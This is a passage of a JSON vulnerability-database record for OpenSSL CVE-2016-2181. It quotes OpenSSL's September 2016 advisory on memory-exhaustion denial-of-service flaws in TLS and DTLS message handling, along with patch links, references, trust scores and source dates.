message. \nThis would allow for messages up to 16Mb in length. Messages of this length are\nexcessive and OpenSSL includes a check to ensure that a peer is sending\nreasonably sized messages in order to avoid too much memory being consumed to\nservice a connection. A flaw in the logic of version 1.1.0 means that memory for\nthe message is allocated too early, prior to the excessive message length\ncheck. Due to way memory is allocated in OpenSSL this could mean an attacker\ncould force up to 21Mb to be allocated to service a connection. This could lead\nto a Denial of Service through memory exhaustion. However, the excessive message\nlength check still takes place, and this would cause the connection to\nimmediately fail. Assuming that the application calls SSL_free() on the failed\nconneciton in a timely manner then the 21Mb of allocated memory will then be\nimmediately freed again. Therefore the excessive memory allocation will be\ntransitory in nature. This then means that there is only a security impact if:\n\n1) The application does not call SSL_free() in a timely manner in the\nevent that the connection fails\nor\n2) The application is working in a constrained environment where there\nis very little free memory\nor\n3) The attacker initiates multiple connection attempts such that there\nare multiple connections in a state where memory has been allocated for\nthe connection; SSL_free() has not yet been called; and there is\ninsufficient memory to service the multiple requests. \n\nExcept in the instance of (1) above any Denial Of Service is likely to\nbe transitory because as soon as the connection fails the memory is\nsubsequently freed again in the SSL_free() call. However there is an\nincreased risk during this period of application crashes due to the lack\nof memory - which would then mean a more serious Denial of Service. \n\nThis issue does not affect DTLS users. \n\nOpenSSL 1.1.0 TLS users should upgrade to 1.1.0a\n\nThis issue was reported to OpenSSL on 18th September 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL\ndevelopment team. \n\nExcessive allocation of memory in dtls1_preprocess_fragment() (CVE-2016-6308)\n=============================================================================\n\nSeverity: Low\n\nThis issue is very similar to CVE-2016-6307. The underlying defect is different\nbut the security analysis and impacts are the same except that it impacts DTLS. \n\nA DTLS message includes 3 bytes for its length in the header for the message. \nThis would allow for messages up to 16Mb in length. Messages of this length are\nexcessive and OpenSSL includes a check to ensure that a peer is sending\nreasonably sized messages in order to avoid too much memory being consumed to\nservice a connection. A flaw in the logic of version 1.1.0 means that memory for\nthe message is allocated too early, prior to the excessive message length\ncheck. Due to way memory is allocated in OpenSSL this could mean an attacker\ncould force up to 21Mb to be allocated to service a connection. This could lead\nto a Denial of Service through memory exhaustion. However, the excessive message\nlength check still takes place, and this would cause the connection to\nimmediately fail. Assuming that the application calls SSL_free() on the failed\nconneciton in a timely manner then the 21Mb of allocated memory will then be\nimmediately freed again. Therefore the excessive memory allocation will be\ntransitory in nature. This then means that there is only a security impact if:\n\n1) The application does not call SSL_free() in a timely manner in the\nevent that the connection fails\nor\n2) The application is working in a constrained environment where there\nis very little free memory\nor\n3) The attacker initiates multiple connection attempts such that there\nare multiple connections in a state where memory has been allocated for\nthe connection; SSL_free() has not yet been called; and there is\ninsufficient memory to service the multiple requests. \n\nExcept in the instance of (1) above any Denial Of Service is likely to\nbe transitory because as soon as the connection fails the memory is\nsubsequently freed again in the SSL_free() call. However there is an\nincreased risk during this period of application crashes due to the lack\nof memory - which would then mean a more serious Denial of Service. \n\nThis issue does not affect TLS users. \n\nOpenSSL 1.1.0 DTLS users should upgrade to 1.1.0a\n\nThis issue was reported to OpenSSL on 18th September 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL\ndevelopment team. \n\nNote\n====\n\nAs per our previous announcements and our Release Strategy\n(https://www.openssl.org/policies/releasestrat.html), support for OpenSSL\nversion 1.0.1 will cease on 31st December 2016. No security updates for that\nversion will be provided after that date. Users of 1.0.1 are advised to\nupgrade. \n\nSupport for versions 0.9.8 and 1.0.0 ended on 31st December 2015. Those\nversions are no longer receiving security updates. \n\nReferences\n==========\n\nURL for this Security Advisory:\nhttps://www.openssl.org/news/secadv/20160922.txt\n\nNote: the online version of the advisory may be updated with additional details\nover time. \n\nFor details of OpenSSL severity classifications please see:\nhttps://www.openssl.org/policies/secpolicy.html\n", "sources": [ { "db": "NVD", "id": "CVE-2016-2181" }, { "db": "JVNDB", "id": "JVNDB-2016-004779" }, { "db": "BID", "id": "92982" }, { "db": "VULMON", "id": "CVE-2016-2181" }, { "db": "PACKETSTORM", "id": "138870" }, { "db": "PACKETSTORM", "id": "138817" }, { "db": "PACKETSTORM", "id": "138820" }, { "db": "PACKETSTORM", "id": "138826" }, { "db": "PACKETSTORM", "id": "169633" } ], "trust": 2.43 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2016-2181", "trust": 3.3 }, { "db": "BID", "id": "92982", "trust": 2.0 }, { "db": "MCAFEE", "id": "SB10215", "trust": 1.7 }, { "db": "SECTRACK", "id": "1036690", "trust": 1.7 }, { "db": "TENABLE", "id": "TNS-2016-16", "trust": 1.7 }, { "db": "TENABLE", "id": "TNS-2016-21", "trust": 1.7 }, { "db": "TENABLE", "id": "TNS-2016-20", "trust": 1.7 }, { "db": "PULSESECURE", "id": "SA40312", "trust": 1.7 }, { "db": "SIEMENS", "id": "SSA-412672", "trust": 1.7 }, { "db": "JUNIPER", "id": "JSA10759", "trust": 1.7 }, { "db": "JVN", "id": "JVNVU98667810", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2016-004779", "trust": 0.8 }, { "db": "AUSCERT", "id": "ESB-2022.0696", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-201609-102", "trust": 0.6 }, { "db": "ICS CERT", "id": "ICSA-22-349-21", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2016-2181", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "138870", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "138817", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "138820", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "138826", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "169633", "trust": 0.1 } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-2181" }, { "db": "BID", "id": "92982" }, { "db": "JVNDB", "id": "JVNDB-2016-004779" }, { "db": "PACKETSTORM", "id": "138870" }, { "db": "PACKETSTORM", "id": "138817" }, { "db": "PACKETSTORM", "id": "138820" }, { "db": "PACKETSTORM", "id": "138826" }, { "db": "PACKETSTORM", "id": "169633" }, { "db": "NVD", "id": "CVE-2016-2181" }, { "db": "CNNVD", "id": "CNNVD-201609-102" } ] }, "id": "VAR-201609-0596", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.3797576935714285 }, "last_update_date": "2023-12-18T11:18:55.172000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "cisco-sa-20160927-openssl", "trust": 0.8, "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20160927-openssl" }, { "title": "1995039", "trust": 0.8, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995039" }, { "title": "NV17-001", "trust": 0.8, "url": "http://jpn.nec.com/security-info/secinfo/nv17-001.html" }, { "title": "OpenSSL 1.0.2 Series Release Notes", "trust": 0.8, "url": "https://www.openssl.org/news/openssl-1.0.2-notes.html" }, { "title": "OpenSSL 1.0.1 Series Release Notes", "trust": 0.8, "url": "https://www.openssl.org/news/openssl-1.0.1-notes.html" }, { "title": "Fix DTLS replay protection", "trust": 0.8, "url": "https://git.openssl.org/?p=openssl.git;a=commit;h=1fb9fdc3027b27d8eb6a1e6a846435b070980770" }, { "title": "Oracle Critical Patch Update Advisory - October 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html" }, { "title": "Oracle Linux Bulletin - October 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2016-3090545.html" }, { "title": "Oracle VM Server for x86 Bulletin - October 2016", "trust": 0.8, "url": "http://www.oracle.com/technetwork/topics/security/ovmbulletinoct2016-3090547.html" }, { "title": "SA40312", "trust": 0.8, "url": "https://kb.pulsesecure.net/articles/pulse_security_advisories/sa40312" }, { "title": "SA132", "trust": 0.8, "url": "https://bto.bluecoat.com/security-advisory/sa132" }, { "title": "JSA10759", "trust": 0.8, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10759" }, { "title": "Splunk Enterprise 6.4.5 addresses multiple vulnerabilities", "trust": 0.8, "url": "http://www.splunk.com/view/sp-caaapue" }, { "title": "Splunk Enterprise 6.5.1 addresses multiple OpenSSL vulnerabilities", "trust": 0.8, "url": "http://www.splunk.com/view/sp-caaapsv" }, { "title": "TNS-2016-16", "trust": 0.8, "url": "https://www.tenable.com/security/tns-2016-16" }, { "title": "OpenSSL Remediation measures for denial of service vulnerabilities", "trust": 0.6, "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=63925" }, { "title": "Red Hat: Important: openssl security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20161940 - security advisory" }, { "title": "Arch Linux Issues: ", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=cve-2016-2181" }, { "title": "Red Hat: CVE-2016-2181", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2016-2181" }, { "title": "Ubuntu Security Notice: openssl vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3087-1" }, { "title": "Ubuntu Security Notice: openssl regression", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3087-2" }, { "title": "Amazon Linux AMI: ALAS-2016-755", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2016-755" }, { "title": "Arch Linux Advisories: [ASA-201609-23] openssl: multiple issues", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-201609-23" }, { "title": "Arch Linux Advisories: [ASA-201609-24] lib32-openssl: multiple issues", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-201609-24" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - January 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=69e9536e77203a3c76b24dd89f4f9300" }, { "title": "Tenable Security Advisories: [R7] Nessus 6.9 Fixes Multiple Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2016-16" }, { "title": "Symantec Security Advisories: SA132 : OpenSSL Vulnerabilities 22-Sep-2016 and 26-Sep-2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=1e6dcaf5dac6ef96a7d917a8c1393040" }, { "title": "Cisco: Multiple Vulnerabilities in OpenSSL Affecting Cisco Products: September 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-20160927-openssl" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=05aabe19d38058b7814ef5514aab4c0c" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - July 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=ac5af5dd99788925425f5747ec672707" }, { "title": "Tenable Security Advisories: [R3] PVS 5.2.0 Fixes Multiple Third-party Library Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2016-20" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - July 2018", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=586e6062440cdd312211d748e028164e" }, { "title": "Tenable Security Advisories: [R2] LCE 4.8.2 Fixes Multiple Third-party Library Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2016-21" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - October 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=6839c4d3fd328571c675c335d58b5591" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - July 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=2f446a7e1ea263c0c3a365776c6713f2" }, { "title": "Forcepoint Security Advisories: CVE-2016-2180 to -2183, -6302 to -6309, -2179, -7052 OpenSSL Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=forcepoint_security_advisories\u0026qid=a9dd8a175d084c7432b7ad47715ac50c" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - April 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=a31bff03e9909229fd67996884614fdf" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - January 2018", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=e2a7f287e9acc8c64ab3df71130bc64d" }, { "title": "Oracle VM Server for x86 Bulletins: Oracle VM Server for x86 Bulletin - October 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_vm_server_for_x86_bulletins\u0026qid=21c0efa2643d707e2f50a501209eb75c" }, { "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - October 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=13f3551b67d913fba90df4b2c0dae0bf" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - April 2018", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=4019ca77f50c7a34e4d97833e6f3321e" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - April 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=143b3fb255063c81571469eaa3cf0a87" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2017", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=523d3f220a64ff01dd95e064bd37566a" }, { "title": "", "trust": 0.1, "url": "https://github.com/live-hack-cve/cve-2016-2181 " }, { "title": "alpine-cvecheck", "trust": 0.1, "url": "https://github.com/tomwillfixit/alpine-cvecheck " } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-2181" }, { "db": "JVNDB", "id": "JVNDB-2016-004779" }, { "db": "CNNVD", "id": "CNNVD-201609-102" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-189", "trust": 1.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-004779" }, { "db": "NVD", "id": "CVE-2016-2181" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.0, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html" }, { "trust": 2.0, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995039" }, { "trust": 2.0, "url": "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html" }, { "trust": 1.9, "url": "http://www.ubuntu.com/usn/usn-3087-1" }, { "trust": 1.8, "url": "http://rhn.redhat.com/errata/rhsa-2016-1940.html" }, { "trust": 1.8, "url": "http://www.ubuntu.com/usn/usn-3087-2" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/topics/security/ovmbulletinoct2016-3090547.html" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2016-3090545.html" }, { "trust": 1.7, "url": "http://www.securityfocus.com/bid/92982" }, { "trust": 1.7, "url": "http://www.splunk.com/view/sp-caaapue" }, { "trust": 1.7, "url": "http://www.splunk.com/view/sp-caaapsv" }, { "trust": 1.7, "url": "https://kb.pulsesecure.net/articles/pulse_security_advisories/sa40312" }, { "trust": 1.7, "url": "https://bto.bluecoat.com/security-advisory/sa132" }, { "trust": 1.7, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10759" }, { "trust": 1.7, "url": "https://www.tenable.com/security/tns-2016-16" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html" }, { "trust": 1.7, "url": "http://www.securitytracker.com/id/1036690" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html" }, { "trust": 1.7, "url": "https://www.tenable.com/security/tns-2016-21" }, { "trust": 1.7, "url": "https://www.tenable.com/security/tns-2016-20" }, { "trust": 1.7, "url": "https://security.freebsd.org/advisories/freebsd-sa-16:26.openssl.asc" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-09/msg00023.html" }, { "trust": 1.7, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10215" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00011.html" }, { "trust": 1.7, "url": "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20170322-01-openssl-en" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-09/msg00031.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00005.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2017-10/msg00011.html" }, { "trust": 1.7, "url": "http://seclists.org/fulldisclosure/2017/jul/31" }, { "trust": 1.7, "url": "http://www.debian.org/security/2016/dsa-3673" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-09/msg00024.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2017-10/msg00010.html" }, { "trust": 1.7, "url": "https://support.f5.com/csp/article/k59298921" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00029.html" }, { "trust": 1.7, "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-412672.pdf" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2018-02/msg00032.html" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00012.html" }, { "trust": 1.7, "url": "https://www.arista.com/en/support/advisories-notices/security-advisories/1749-security-advisory-24" }, { "trust": 1.7, "url": "http://lists.opensuse.org/opensuse-security-announce/2016-09/msg00022.html" }, { "trust": 1.1, "url": "https://git.openssl.org/?p=openssl.git%3ba=commit%3bh=1fb9fdc3027b27d8eb6a1e6a846435b070980770" }, { "trust": 0.9, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20160927-openssl" }, { "trust": 0.9, "url": "https://git.openssl.org/?p=openssl.git;a=commit;h=1fb9fdc3027b27d8eb6a1e6a846435b070980770" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2181" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu98667810/index.html" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-2181" }, { "trust": 0.8, "url": "http://www.bizmobile.co.jp/news_02.php?id=4069\u0026nc=1" }, { "trust": 0.6, "url": "https://www.openssl.org/news/vulnerabilities.html#y2017" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2022.0696" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2182" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2178" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6302" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2179" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2177" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2181" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6306" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6304" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2180" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6303" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2183" }, { "trust": 0.3, "url": "http://openssl.org/" }, { "trust": 0.3, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1369113" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory21.asc" }, { "trust": 0.3, "url": "https://www.ibm.com/blogs/psirt/ibm-security-bulletin-multiple-vulnerabilities-in-openssl-affect-ibm-worklight-and-ibm-mobilefirst-platform-foundation-2/" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024394" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=isg3t1024401" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024648" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1021643" }, { "trust": 0.3, "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html" }, { "trust": 0.3, "url": "http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html" }, { "trust": 0.3, "url": "https://kc.mcafee.com/resources/sites/mcafee/content/live/product_documentation/27000/pd27128/en_us/meg_7_6_406_3402_103_release_notes_en_us.pdf" }, { "trust": 0.3, "url": "https://www.pexip.com/sites/pexip/files/pexip_security_bulletin_2016-10-07.pdf" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21991724" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21992348" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21992898" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21993061" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21993856" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21993875" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995392" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995393" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995691" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995886" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21996181" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg2c1000242" }, { "trust": 0.2, "url": "https://www.openssl.org/news/secadv/20160922.txt" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/189.html" }, { "trust": 0.1, "url": "https://github.com/live-hack-cve/cve-2016-2181" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=48599" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/3087-1/" }, { "trust": 0.1, "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-349-21" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#important" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2180" }, { "trust": 0.1, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-6306" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2177" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2181" }, { "trust": 0.1, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-6304" }, { "trust": 0.1, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2179" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2182" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-6302" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2178" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/key/" }, { "trust": 0.1, "url": "https://www.openssl.org/blog/blog/2016/06/27/undefined-pointer-arithmetic/" }, { "trust": 0.1, "url": "https://www.debian.org/security/faq" }, { "trust": 0.1, "url": "https://www.debian.org/security/" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1-4ubuntu5.37" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu2.20" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.2g-1ubuntu4.4" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu2.21" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1-4ubuntu5.38" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.2g-1ubuntu4.5" }, { "trust": 0.1, "url": "https://launchpad.net/bugs/1626883" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6308" }, { "trust": 0.1, "url": "https://www.openssl.org/policies/secpolicy.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6305" }, { "trust": 0.1, "url": "https://sweet32.info)" }, { "trust": 0.1, "url": "https://www.openssl.org/policies/releasestrat.html)," }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6307" } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-2181" }, { "db": "BID", "id": "92982" }, { "db": "JVNDB", "id": "JVNDB-2016-004779" }, { "db": "PACKETSTORM", "id": "138870" }, { "db": "PACKETSTORM", "id": "138817" }, { "db": "PACKETSTORM", "id": "138820" }, { "db": "PACKETSTORM", "id": "138826" }, { "db": "PACKETSTORM", "id": "169633" }, { "db": "NVD", "id": "CVE-2016-2181" }, { "db": "CNNVD", "id": "CNNVD-201609-102" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2016-2181" }, { "db": "BID", "id": "92982" }, { "db": "JVNDB", "id": "JVNDB-2016-004779" }, { "db": "PACKETSTORM", "id": "138870" }, { "db": "PACKETSTORM", "id": "138817" }, { "db": "PACKETSTORM", "id": "138820" }, { "db": "PACKETSTORM", "id": "138826" }, { "db": "PACKETSTORM", "id": "169633" }, { "db": "NVD", "id": "CVE-2016-2181" }, { "db": "CNNVD", "id": "CNNVD-201609-102" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-09-16T00:00:00", "db": "VULMON", "id": "CVE-2016-2181" }, { "date": "2016-07-05T00:00:00", "db": "BID", "id": "92982" }, { "date": "2016-09-21T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-004779" }, { "date": "2016-09-27T19:32:00", "db": "PACKETSTORM", "id": "138870" }, { "date": "2016-09-22T22:22:00", "db": "PACKETSTORM", "id": "138817" }, { "date": "2016-09-22T22:25:00", "db": "PACKETSTORM", "id": "138820" }, { "date": "2016-09-23T19:19:00", "db": "PACKETSTORM", "id": "138826" }, { "date": "2016-09-22T12:12:12", "db": "PACKETSTORM", "id": "169633" }, { "date": "2016-09-16T05:59:01.347000", "db": "NVD", "id": "CVE-2016-2181" }, { "date": "2016-08-25T00:00:00", "db": "CNNVD", "id": "CNNVD-201609-102" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2023-11-07T00:00:00", "db": "VULMON", "id": "CVE-2016-2181" }, { "date": "2018-02-05T14:00:00", "db": "BID", "id": "92982" }, { "date": "2017-07-25T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-004779" }, { "date": "2023-11-07T02:31:01.697000", "db": "NVD", "id": "CVE-2016-2181" }, { "date": "2022-12-14T00:00:00", "db": "CNNVD", "id": "CNNVD-201609-102" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "138870" }, { "db": "PACKETSTORM", "id": "138820" }, { 